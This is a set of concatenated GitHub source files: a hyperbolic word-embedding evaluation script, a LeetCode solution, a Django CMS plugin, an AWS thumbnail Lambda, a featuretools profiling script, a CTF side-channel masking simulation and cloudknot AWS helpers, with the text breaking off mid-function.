use_scaling=args.use_scaling,\n lr=args.lr,\n optimizer=optimizer,\n ckpt_word_list=ckpt_word_list,\n init_near_border=args.init_near_border,\n init_pretrained_config=initialization_config,\n callbacks=callbacks,\n vector_size=args.size,\n vector_dtype=REAL)\n\n if args.use_scaling:\n print(\"Final scaling factor is {}\".format(model.scaling_factor))\n\n if optimizer == \"wfullrsgd\" or optimizer == \"fullrsgd\":\n logging.info(\"\")\n logging.info(\"Number of projections back to the Poincare ball: {}\".format(model.num_projections))\n\n # Cleanup model.\n model.cleanup()\n\n # Save model.\n print(\"Saving model to {}\".format(model_filename))\n with open(model_filename, \"wb\") as f:\n model.save(f)\n else:\n model = Glove.load(args.model_filename)\n wv = model.wv\n wv.trainables = model.trainables\n\n # XXX: uncomment to evaluate the model with the scaled and projected pretrained embeddings used for initialization\n # wv.vectors = model.trainables.initialization_config.init_vectors\n\n directory = os.path.join(args.root, \"eval_logs\")\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n # Extract model info from the model filename.\n config, basename = parse_model_filename(args.model_filename)\n\n # Ugly fix. To ensure backward compatibilty with an earlier version that used a different convention for the filename.\n if config is None:\n config = {}\n config[\"similarity\"] = \"poincare\" if (\"poincare\" in basename) else (\"euclid\" if (\"euclid\" in basename) else \"vanilla\")\n\n analogy_type = None\n if args.cosadd:\n analogy_type = \"cosadd\"\n elif args.cosmul:\n analogy_type = \"cosmul\"\n elif args.distadd:\n analogy_type = \"distadd\"\n elif args.hypcosadd:\n analogy_type = \"hypcosadd\"\n elif config[\"similarity\"] == \"poincare\":\n if args.cosine_eval:\n analogy_type = \"hyp_pt-eucl-cos-dist\"\n else:\n analogy_type = \"hyp_pt\"\n elif config[\"similarity\"] == \"mix-poincare\":\n if args.cosine_eval:\n analogy_type = \"mix-hyp_pt-eucl-cos-dist\"\n else:\n analogy_type = \"mix-hyp_pt\"\n else:\n analogy_type = \"cosadd\" # The default for dot product and Euclidean embeddings is 3COSADD\n\n if config[\"similarity\"] == \"mix-poincare\" and \"num_embs\" not in config:\n raise RuntimeError(\"Mix Poincare embeddings should have a valid number of small embeddings\")\n\n if args.agg_eval:\n compute_poincare_aggregate(model, config)\n\n if args.ctx_eval:\n model.wv.vectors = model.trainables.syn1neg\n\n if args.shift_origin:\n left_offset = -np.average(model.wv.vectors, axis=0)\n # right_offset = -np.average(model.wv.vectors, axis=0)\n left_offset_mat = np.tile(left_offset.reshape(1, -1), (model.wv.vectors.shape[0], 1))\n # right_offset_mat = np.tile(right_offset.reshape(1, -1), (model.wv.vectors.shape[0], 1))\n\n model.wv.vectors = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.moebius_add_mat(\n left_offset_mat, model.wv.vectors)\n # model.wv.vectors = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.moebius_add_mat(\n # model.wv.vectors, right_offset_mat)\n\n if config[\"similarity\"] == \"poincare\" or config[\"similarity\"] == \"mix-poincare\":\n if args.cosine_eval:\n model.wv.use_poincare_distance = False\n model.wv.init_sims()\n else:\n model.wv.use_poincare_distance = True\n\n # Create name for file that will store the logs.\n eval_log_filename = \"eval_logs/eval_\" + basename.split(\"_\", 1)[1] + \"_\" + analogy_type + \\\n (\"_agg\" if args.agg_eval else (\"_ctx\" if args.ctx_eval else \"\"))\n # eval_log_filename = eval_log_filename + (\"_cosdist\" if config[\"similarity\"] == \"poincare\" and args.cosine_eval else \"\")\n eval_log_filename = os.path.join(args.root, eval_log_filename)\n feval = None\n if args.restrict_vocab != 0:\n feval = open(eval_log_filename, \"w+\")\n logger = Logger(feval)\n else:\n # Don't save the output to file if we are not running the word analogy benchmarks.\n logger = Logger()\n\n if len(config) > 1:\n logger.log('MODEL: (Epochs, {}), (Emb size, {}), (LR, {}), (Optimizer, {}), (With bias, {}), (Similarity, {}), (Dist. func. {}), (Scaling, {}), (Use Log-Probs, {}), (Restrict vocab, {})'.format(\n config[\"epochs\"], config[\"emb_size\"], config[\"lr\"], config[\"optimizer\"].upper(), \"yes\" if config[\"with_bias\"] else \"no\",\n config[\"similarity\"], config[\"dist_func\"].upper(), config[\"use_scaling\"], config[\"use_log_probs\"],\n config[\"restrict_vocab\"]\n ))\n\n if args.restrict_vocab != 0:\n logger.log('EVALUATION: (Analogy type, {}), (Vectors used, {})'.format(\n analogy_type, (\"W+C\" if args.agg_eval else (\"C\" if args.ctx_eval else \"W\"))))\n else:\n logger.log()\n\n sim_debug_file = None\n if args.is_debug:\n sim_debug_file = os.path.join(args.root, \"eval_logs/debug_similarity.csv\")\n hyperlex_debug_file = None\n if args.is_debug:\n hyperlex_debug_file = os.path.join(args.root, \"eval_logs/debug_hyperlex.csv\")\n\n # logger.log(\"========= Various statistics =========\")\n # norms_distribution(model)\n # wordnet_level_rank_vector_norm_correlation(model, args.root)\n\n logger.log(\"========= Similarity evaluation =========\")\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'rare_word.txt'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"Stanford Rare World: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'wordsim353.tsv'),\n dummy4unknown=False,\n debug_file=sim_debug_file,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"WordSim353: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'simlex999.txt'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"SimLex999: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'mturk771.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MTurk771: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'simverb3500.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"SimVerb3500: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'men_dataset.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MEN: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'MC-30.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"MC: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'RG-65.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"RG: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n pearson, spearman, ratio = wv.evaluate_word_pairs(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'YP-130.tsv'),\n dummy4unknown=False,\n restrict_vocab=args.restrict_vocab\n )\n logger.log(\"YP: {:.4f} {:.4f} {:.4f}\".format(pearson[0], spearman[0], ratio))\n\n if args.restrict_vocab != 0:\n logger.log(\"=========== Analogy evaluation ==========\")\n most_similar = None\n if analogy_type == \"cosadd\" or analogy_type == \"hypcosadd\":\n most_similar = gensim.models.keyedvectors.VanillaWordEmbeddingsKeyedVectors.batch_most_similar_analogy\n elif analogy_type == \"cosmul\":\n most_similar = gensim.models.keyedvectors.VanillaWordEmbeddingsKeyedVectors.batch_most_similar_cosmul_analogy\n elif analogy_type == \"hyp_pt\" or analogy_type == \"hyp_pt-eucl-cos-dist\":\n most_similar = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.batch_most_similar_hyperbolic_analogy\n elif analogy_type == \"mix-hyp_pt\" or analogy_type == \"mix-hyp_pt-eucl-cos-dist\":\n most_similar = gensim.models.keyedvectors.MixPoincareWordEmbeddingsKeyedVectors.batch_most_similar_mix_hyperbolic_analogy\n elif analogy_type == \"distadd\":\n most_similar = gensim.models.keyedvectors.PoincareWordEmbeddingsKeyedVectors.batch_most_similar_3distadd_analogy\n else:\n raise RuntimeError(\"Unknown analogy type.\")\n\n print(config[\"similarity\"], analogy_type)\n if (config[\"similarity\"] == \"mix-poincare\" or config[\"similarity\"] == 'poincare') and (analogy_type == \"cosadd\" or analogy_type == \"cosmul\"):\n model.wv.vectors_norm = None\n gensim.models.keyedvectors.WordEmbeddingsKeyedVectors.init_sims(model.wv)\n if config[\"similarity\"] == \"poincare\" and args.cosine_eval:\n model.wv.vectors_norm = None\n gensim.models.keyedvectors.WordEmbeddingsKeyedVectors.init_sims(model.wv)\n\n start = time.time()\n analogy_eval = wv.accuracy(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data', 'questions-words.txt'),\n restrict_vocab=args.restrict_vocab,\n most_similar=most_similar,\n debug=args.is_debug)\n # Now, instead of adding the correct/incorrect words to a list, I am just counting the number of correct/incorrect answers.\n logger.log(\"Semantic Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-3]['correct'][0],\n analogy_eval[-3]['correct'][0] + analogy_eval[-3]['incorrect'][0],\n analogy_eval[-3]['t_argmax'][0],\n analogy_eval[-3]['correct'][0] / (analogy_eval[-3]['correct'][0] + analogy_eval[-3]['incorrect'][0]),\n analogy_eval[-3]['correct'][0] / SEM_GOOGLE_SIZE))\n logger.log(\"Syntactic Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-2]['correct'][0],\n analogy_eval[-2]['correct'][0] + analogy_eval[-2]['incorrect'][0],\n analogy_eval[-2]['t_argmax'][0],\n analogy_eval[-2]['correct'][0] / (analogy_eval[-2]['correct'][0] + analogy_eval[-2]['incorrect'][0]),\n analogy_eval[-2]['correct'][0] / SYN_GOOGLE_SIZE))\n logger.log(\"Google: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-1]['correct'][0],\n analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0],\n analogy_eval[-1]['t_argmax'][0],\n analogy_eval[-1]['correct'][0] / (analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0]),\n analogy_eval[-1]['correct'][0] / GOOGLE_SIZE))\n\n if not args.is_debug:\n analogy_eval = wv.accuracy(\n os.path.join(args.root, 'msc_tifreaa/gensim/test/test_data/', 'msr_word_relationship.processed'),\n restrict_vocab=args.restrict_vocab,\n most_similar=most_similar)\n # Now, instead of adding the correct/incorrect words to a list, I am just counting the number of correct/incorrect answers.\n logger.log(\"Microsoft: {} {} {:.2f} {:.4f} {:.4f}\".format(analogy_eval[-1]['correct'][0],\n analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0],\n analogy_eval[-1]['t_argmax'][0],\n analogy_eval[-1]['correct'][0] / (analogy_eval[-1]['correct'][0] + analogy_eval[-1]['incorrect'][0]),\n analogy_eval[-1]['correct'][0] / MSR_SIZE))\n logging.info(\"\")\n logging.info(\"Analogy task took {} seconds to perform.\".format(time.time() - start))\n if feval:\n feval.close()\n","repo_name":"alex-tifrea/poincare_glove","sub_path":"glove_code/scripts/glove_main.py","file_name":"glove_main.py","file_ext":"py","file_size_in_byte":32472,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"32"} +{"seq_id":"32970222407","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n \n # Sliding window\n charSet = set()\n \n left = 0\n res = 0\n \n for right in range(len(s)):\n # While the character is in the set\n while s[right] in charSet:\n # Delete the char from the set and shift the left pointer\n charSet.remove(s[left])\n left += 1\n # If the char is not in the set then add it\n charSet.add(s[right])\n # right - next + 1 (right index minus left index + 1 (arrays start at 0)) to get the size of the window (longest length)\n res = max(res, right - left + 1)\n return res\n ","repo_name":"CelesTech03/Leetcode-Grind","sub_path":"0003-longest-substring-without-repeating-characters/0003-longest-substring-without-repeating-characters.py","file_name":"0003-longest-substring-without-repeating-characters.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34553865847","text":"from cms.plugin_pool import plugin_pool\nfrom cms.plugin_base import CMSPluginBase\nfrom django.utils.translation import ugettext_lazy as _\nimport models\nfrom django.db import models as djmodels\nfrom django.conf import settings\n\nfrom djangocms_text_ckeditor.widgets import TextEditorWidget\n\ntry:\n from settings import TEASER_PLUGIN_TEMPLATES\nexcept:\n TEASER_PLUGIN_TEMPLATES = (\n ('intro_wiget.html', 'Slider List'),\n )\n\nclass FilerTeaserPlugin(CMSPluginBase):\n \"\"\"\n TODO: this plugin is becoming very similar to the image plugin... code\n should be re-used somehow.\n \"\"\"\n module = 'Filer'\n model = models.FilerTeaser\n name = _(\"Teaser\")\n render_template = \"cmsplugin_filer_teaser/teaser.html\"\n\n\n formfield_overrides = {\n djmodels.TextField : {'widget': TextEditorWidget}\n }\n\n def _get_thumbnail_options(self, context, instance):\n \"\"\"\n Return the size and options of the thumbnail that should be inserted\n \"\"\"\n width, height = None, None\n subject_location = False\n placeholder_width = context.get('width', None)\n placeholder_height = context.get('height', None)\n if instance.use_autoscale and placeholder_width:\n # use the placeholder width as a hint for sizing\n width = int(placeholder_width)\n if instance.use_autoscale and placeholder_height:\n height = int(placeholder_height)\n elif instance.width:\n width = instance.width\n if instance.height:\n height = instance.height\n if instance.image:\n if instance.image.subject_location:\n subject_location = instance.image.subject_location\n if not height and width:\n # height was not externally defined: use ratio to scale it by the width\n height = int( float(width)*float(instance.image.height)/float(instance.image.width) )\n if not width and height:\n # width was not externally defined: use ratio to scale it by the height\n width = int( float(height)*float(instance.image.width)/float(instance.image.height) )\n if not width:\n # width is still not defined. fallback the actual image width\n width = instance.image.width\n if not height:\n # height is still not defined. fallback the actual image height\n height = instance.image.height\n return {'size': (width, height),\n 'subject_location': subject_location}\n\n def get_thumbnail(self, context, instance):\n if instance.image:\n return instance.image.image.file.get_thumbnail(self._get_thumbnail_options(context, instance))\n\n def render(self, context, instance, placeholder):\n options = self._get_thumbnail_options(context, instance)\n context.update({\n 'instance': instance,\n 'link': instance.link,\n 'opts': options,\n 'size': options.get('size',None),\n 'placeholder': placeholder\n })\n return context\n\nclass FilerTeaserListPlugin(CMSPluginBase):\n\n model = models.FilerTeaserList\n module = 'Filer'\n name = _(\"TeaserList\")\n render_template = TEASER_PLUGIN_TEMPLATES[0][0]\n filter_horizontal = ('filer_teasers',)\n\n formfield_overrides = {\n djmodels.TextField : {'widget': TextEditorWidget}\n }\n\n def render(self, context, instance, placeholder):\n if instance and instance.template:\n self.render_template = instance.template\n context.update({\n 'object':instance, \n 'placeholder':placeholder,\n 'teasers':instance.filer_teasers.all()\n })\n return context\n\nplugin_pool.register_plugin(FilerTeaserPlugin)\nplugin_pool.register_plugin(FilerTeaserListPlugin)\n","repo_name":"Alexascet/cmsplugin-filer-teaser","sub_path":"cmsplugin_filer_teaser/cms_plugins.py","file_name":"cms_plugins.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2730286214","text":"import json\nfrom PIL import Image\nimport boto3\nimport os\n\ns3 = boto3.resource('s3')\ns3_bucket_lookup = {\"multitenant\": \"gigwalk-multitenant-api-server\", \"beta\": \"gigwalk-beta-api-server\", \"stage\": \"gigwalk-stage-app-api-server\", \"jp_prod\": \"gigwalk-japan-api-server\", \"jp_stage\": \"gigwalk-jp-staging-api-server\", \"jp_partner\": \"gigwalk-partner-jp-api-server\", \"csmk_partner\": \"gigwalk-uu-partner\", \"csmk_partner_dev\": \"gigwalk-partner-dev-api-server\", \"csmk_prod\": \"gigwalk-uu\"}\ns3_bucket_inverse_lookup = {v: k for k, v in s3_bucket_lookup.items()}\n\n\ndef lambda_handler(event, context):\n s3bucket = None\n s3_file_key = None\n env_key = None\n\n print(event)\n # there are 2 types of events\n # s3 events, image created on s3\n if event.get('Records'):\n s3bucket_name = event['Records'][0]['s3']['bucket']['name']\n s3_file_key = event['Records'][0]['s3']['object']['key']\n env_key = s3_bucket_inverse_lookup.get(s3bucket_name)\n # API event, creating the thumbnails on the fly\n elif event.get('queryStringParameters') and event.get('queryStringParameters').get('key') :\n env_key, s3_file_key = event['queryStringParameters']['key'].split('/', 1) \n s3bucket_name = s3_bucket_lookup.get(env_key)\n\n print(s3bucket_name, s3_file_key, env_key)\n\n # any of the required info is missing, failing with 400 response code\n if not all((s3bucket_name, s3_file_key, env_key)):\n return {\"statusCode\": 400}\n bucket = s3.Bucket(s3bucket_name)\n try:\n _resize_image(bucket, env_key, s3_file_key)\n except Exception as e:\n return {\"statusCode\": 400}\n\n return {\n \"statusCode\": 302,\n \"headers\": {\"Location\": 'http://gigwalk-thumbnails.s3-website-us-east-1.amazonaws.com/'+env_key+'/'+s3_file_key}\n # \"headers\": {\"Location\": 'https://google.com'}\n }\n\n\ndef _resize_image(orig_bucket, env_key, s3_file_key):\n print(\"resize image:\", env_key, s3_file_key)\n tmp_file = '/tmp/tmp.jpg'\n try:\n orig_bucket.download_file(s3_file_key, tmp_file)\n img = Image.open(tmp_file)\n img.thumbnail([300, 300], Image.ANTIALIAS)\n img.save(tmp_file)\n data = open(tmp_file, 'rb')\n thumbnail_bucket = s3.Bucket('gigwalk-thumbnails')\n s3_key = env_key+'/'+s3_file_key\n thumbnail_bucket.put_object(Key=s3_key, Body=data, ACL='public-read')\n except Exception as e:\n print(e)\n raise e\n","repo_name":"00derek/gigwalk_philbrows","sub_path":"image_resize/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":2438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11523777679","text":"\"\"\"\ndfs_profile.py\n\nHelper module to allow profiling of the dfs operations. At some point we may\nwant to use pstats to output the results to a log, but I'm anticipating that\nLookingGlass will provide the performance data we want.\n\nNotes:\n - output currently goes to the root directory and is in dfs_profile.stats\n - *.stats is gitignored\n - it uses the demo customers dataset for testing\n - max_depth > 2 is very slow (currently)\n - stats output can be viewed online with https://nejc.saje.info/pstats-viewer.html\n\"\"\"\nimport cProfile\nfrom pathlib import Path\n\nimport featuretools as ft\nimport featuretools.demo as demo\nfrom featuretools.synthesis.dfs import dfs\n\nes = demo.load_retail()\n\nall_aggs = ft.primitives.get_aggregation_primitives()\nall_trans = ft.primitives.get_transform_primitives()\n\nprofiler = cProfile.Profile(builtins=False)\nprofiler.enable()\nfeature_defs = dfs(\n entityset=es,\n target_dataframe_name=\"customers\",\n trans_primitives=all_trans,\n agg_primitives=all_aggs,\n max_depth=2,\n features_only=True,\n)\nprofiler.disable()\nprofiler.dump_stats(Path.cwd() / \"dfs_profile.stats\")\n","repo_name":"alteryx/featuretools","sub_path":"featuretools/tests/profiling/dfs_profile.py","file_name":"dfs_profile.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":6873,"dataset":"github-code","pt":"32"} +{"seq_id":"45030194497","text":"\nfrom random import randint\n\nd = 4\nf = \"A\"\nflag = bytearray()\nflag.extend(f)\nm = \"Z\"\nmask = bytearray()\nmask.extend(f)\n\ndef bytes_to_bits(bytes_array):\n bits = []\n for o in bytes_array:\n for i in range(8):\n bits.append((o >> i) & 1)\n return bits\n\ndef xor(l):\n res = 0\n for i in l:\n res ^= i\n return res\n\ndef simulate_leaks(flag, mask, probes, hook=None):\n \"\"\"\n Simulate the value on the wires probed when computing the bitwise AND\n between the flag (constant) and a constant mask. This function is\n called just after the user gives his probes.\n \"\"\"\n leaks = []\n masked_flag_bits = []\n\n print(\"flag\", flag, bytes_to_bits(flag))\n print(\"mask\", mask, bytes_to_bits(mask))\n\n for a, b in zip(bytes_to_bits(flag), bytes_to_bits(mask)):\n c, leak = secure_and(a, b, d, probes, hook)\n masked_flag_bits.append(c)\n leaks.append(leak)\n\n return leaks\n\ndef sharing(s, d):\n if s not in [0, 1]:\n raise ValueError(\"Only binary value accepted\")\n \"\"\"\n Make a sharing of `s` into `d`+1 shares such that the XOR of the `d`+1\n shares is equal to `s`.\n \"\"\"\n\n s_sharing = []\n for i in range(d):\n s_sharing.append(randint(0,1))\n s_sharing.append(xor(s_sharing)^s)\n \n return s_sharing\n\ndef secure_and(a, b, d, probes, hook=None):\n \"\"\"\n Mimic a hardware circuit \"securely\" computing `a`&`b` and return the \n result as well as the information that an attacker would have by\n probing on the wires defined in `probes`. The maximum number of probes\n allowed is `d`.\n \"\"\"\n if len(probes) > d:\n raise ValueError('Too many probes')\n\n leaks = {}\n\n if hook is not None:\n print(\"\\n---\")\n print(\"before sharing a: %r\" % a)\n print(\"before sharing b: %r\" % b)\n\n a = sharing(a, d)\n b = sharing(b, d)\n if hook == \"x\":\n print(\"after sharing a: %r\" % a)\n print(\"after sharing b: %r\" % b)\n else:\n if \"a\" in hook:\n print(\"a: %r\" % a)\n if \"b\" in hook:\n print(\"b: %r\" % b)\n\n # a and b leaks\n for i in range(d+1):\n wire = 'a_{}'.format(i)\n if wire in probes:\n leaks[wire] = a[i]\n wire = 'b_{}'.format(i)\n if wire in probes:\n leaks[wire] = b[i]\n \n alpha = []\n for i in range(len(a)):\n alpha.append([])\n for j in range(len(b)):\n alpha[-1].append(a[i] & b[j])\n wire = 'alpha_{},{}'.format(i, j)\n if wire in probes:\n leaks[wire] = alpha[i][j]\n if hook == \"x\" or \"p\" in hook:\n print(\"alpha: %r\" % alpha)\n\n ## d-compression algorithm\n c_sharing = []\n for i in range(d+1):\n tmp = 0\n for j in range(d+1):\n if j != d:\n x = ((j%d)+i)%(d+1)\n if hook == \"x\" or \"z\" in hook:\n print(\"c_%d,%d = tmp ^ alpha[%d][%d] = %d ^ %d = %d\" % (i, j, x, i, tmp, alpha[x][i], tmp ^ alpha[x][i]))\n tmp ^= alpha[x][i]\n else:\n x = ((j%d)+i)%(d+1)\n y = (i+1)%(d+1)\n if hook == \"x\" or \"z\" in hook:\n print(\"c_%d,%d = tmp ^ alpha[%d][%d] = %d ^ %d = %d\" % (i, j, x, y, tmp, alpha[x][y], tmp ^ alpha[x][y]))\n tmp ^= alpha[x][y]\n wire = 'c_{},{}'.format(i, j)\n if wire in probes:\n leaks[wire] = tmp\n c_sharing.append(tmp)\n if hook == \"x\" or \"s\" in hook:\n print(\"c_sharing: %r\" % c_sharing)\n \n ## Canonical decoder\n c = xor(c_sharing)\n if hook == \"x\" or \"c\" in hook:\n print(\"c: %r\" % c)\n\n if len(leaks) > len(probes):\n raise Exception(\"Something went wrong with the leaks\")\n\n return c, leaks\n\n\ndef play(flag, mask):\n import os\n\n flag = bytearray()\n flag.extend(\"Z\")\n mask = bytearray()\n mask.extend(\"B\")\n ex = [\"q\", \"exit\", \"quit\"]\n while True:\n try:\n print(\"\\n\\n=== \")\n cmd = raw_input(\"What do we do? \")\n if cmd in ex:\n break\n if cmd in [\"cls\", \"clear\", \"reset\"]:\n os.system(\"reset||cls\")\n if cmd.startswith(\"flag\"):\n flag = bytearray()\n flag.extend(cmd.split(\"flag \")[1])\n elif cmd.startswith(\"mask\"):\n mask = bytearray()\n mask.extend(cmd.split(\"mask \")[1])\n elif cmd.startswith(\"bits\"):\n print(bytes_to_bits(flag), len(bytes_to_bits(maks)))\n elif cmd.startswith(\"sharing\"):\n tmp = bytes_to_bits(flag)\n for i, a, b in zip(xrange(len(tmp)), tmp, bytes_to_bits(mask)):\n print(i, a, sharing(a, d), b, sharing(b, d))\n elif cmd.startswith(\"probe\"):\n probes = cmd.split(\"probe \")[1]\n print(simulate_leaks(flag, mask, probes))\n elif cmd.startswith(\"dbg\"):\n # x to debug all\n # z to debug c_sharing tables\n # p to debug alpha\n # a to debug a\n # b to debug b\n # s to debug c_sharing\n # c to debug c\n print(simulate_leaks(flag, mask, [\"b_4\", \"alpha_3,4\", \"c_4,3\"], cmd.split(\"dbg \")[1]))\n print(bytes_to_bits(flag))\n except KeyboardInterrupt:\n cmd = raw_input(\"\\nDo we quit? \")\n if cmd in ex + [\"y\", \"yes\"]:\n break\n except IndexError:\n print(\"Error in the cmd\")\n\n\nplay(flag, mask)\n# nc chohzatheeghahwoesus.challenge.grehack.fr 2341\n# a = a[0] ^ a[1] ^ a[2] ^ a[3] ^ a[4]\n# b = b[0] ^ b[1] ^ b[2] ^ b[3] ^ b[4]\n# flag[0] & mask[0] = c[0] = ((a[0] ^ b[0]) ^ c_sharing[0]) ^ ((a[1] ^ b[1]) ^ c_sharing[1]) ... ^ ((a[4] ^ b[4]) ^ c_sharing[4])\n# flag[X] & mask[X] = c[X] = ((a[0] ^ b[0]) ^ c_sharing[0]) ^ ((a[1] ^ b[1]) ^ c_sharing[1]) ... ^ ((a[4] ^ b[4]) ^ c_sharing[4])","repo_name":"Synacktiv-contrib/grehack","sub_path":"2018/prequals/05_Micro-probing_attack/custom_probe.py","file_name":"custom_probe.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"39491845047","text":"from core import *\nfrom ESP.esp_python_client import *\nimport time\n\nESP_SERVER_IP = \"http://192.168.1.6/\" # Eslam Home\n\n\n# ESP_SERVER_IP = \"http://192.168.4.1/\" #IN case of ESP hotspot\n\n\nif __name__ == \"__main__\":\n\n time.sleep(2)\n # print(\"Connected to camera\")\n sleepTime = {\"F\": 0.3, \"R\": 0.05, \"L\": 0.05, \"S\": 0.1}\n while True:\n imgResp = urllib.request.urlopen('http://192.168.1.4:8080/shot.jpg')\n\n # Numpy to convert into a array\n imgNp = np.array(bytearray(imgResp.read()), dtype=np.uint8)\n\n #decode the array to OpenCV usable format\n frame = cv2.imdecode(imgNp, -1)\n direction = compute_direction(frame)\n print(direction)\n test_photo(frame)\n# ---------------------------------------------------------------------------- #\n #move, wait, stop\n sendMessage(ESP_SERVER_IP, direction)\n time.sleep(sleepTime.get(direction,1))\n sendMessage(ESP_SERVER_IP, \"S\")\n time.sleep(0.2)\n\n# ---------------------------------------------------------------------------- #\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cv2.destroyAllWindows()\n","repo_name":"eslam69/EAOS-Car","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"8954114920","text":"from __future__ import absolute_import, division, print_function\n\nimport boto3\nimport botocore\nimport configparser\nimport json\nimport logging\nimport os\nimport re\nimport uuid\nfrom collections import namedtuple\n\nfrom ..config import get_config_file, rlock\n\n__all__ = [\"clients\"]\n\n\ndef registered(fn):\n __all__.append(fn.__name__)\n return fn\n\n\nmod_logger = logging.getLogger(__name__)\n\n\n@registered\ndef get_ecr_repo():\n \"\"\"Get the cloudknot ECR repository\n\n First, check the cloudknot config file for the ecr-repo option.\n If that fails, check for the CLOUDKNOT_ECR_REPO environment variable.\n If that fails, use 'cloudknot'\n\n Returns\n -------\n repo : string\n Cloudknot ECR repository name\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n option = 'ecr-repo'\n if config.has_section('aws') and config.has_option('aws', option):\n repo = config.get('aws', option)\n else:\n # Set `repo`, the fallback repo in case the cloudknot\n # repo environment variable is not set\n try:\n # Get the region from an environment variable\n repo = os.environ['CLOUDKNOT_ECR_REPO']\n except KeyError:\n repo = 'cloudknot'\n\n # Use set_ecr_repo to check for name availability\n # and write to config file\n set_ecr_repo(repo)\n\n return repo\n\n\n@registered\ndef set_ecr_repo(repo):\n \"\"\"Set the cloudknot ECR repo\n\n Set repo by modifying the cloudknot config file\n\n Parameters\n ----------\n repo : string\n Cloudknot ECR repo name\n \"\"\"\n # Update the config file\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n with rlock:\n config.read(config_file)\n\n if not config.has_section('aws'): # pragma: nocover\n config.add_section('aws')\n\n config.set('aws', 'ecr-repo', repo)\n with open(config_file, 'w') as f:\n config.write(f)\n\n try:\n # If repo exists, retrieve its info\n clients['ecr'].describe_repositories(\n repositoryNames=[repo]\n )\n except clients['ecr'].exceptions.RepositoryNotFoundException:\n # If it doesn't exists already, then create it\n clients['ecr'].create_repository(repositoryName=repo)\n\n\n@registered\ndef get_s3_params():\n \"\"\"Get the cloudknot S3 bucket and corresponding access policy\n\n For the bucket name, first check the cloudknot config file for the bucket\n option. If that fails, check for the CLOUDKNOT_S3_BUCKET environment\n variable. If that fails, use\n 'cloudknot-' + get_user().lower() + '-' + uuid4()\n\n For the policy name, first check the cloudknot config file. If that fails,\n use 'cloudknot-bucket-access-' + str(uuid.uuid4())\n\n For the region, first check the cloudknot config file. If that fails,\n use the current cloudknot region\n\n Returns\n -------\n bucket : NamedTuple\n A namedtuple with fields ['bucket', 'policy', 'policy_arn', 'sse']\n \"\"\"\n config_file = get_config_file()\n config = configparser.ConfigParser()\n\n BucketInfo = namedtuple('BucketInfo',\n ['bucket', 'policy', 'policy_arn', 'sse'])\n\n with rlock:\n config.read(config_file)\n\n option 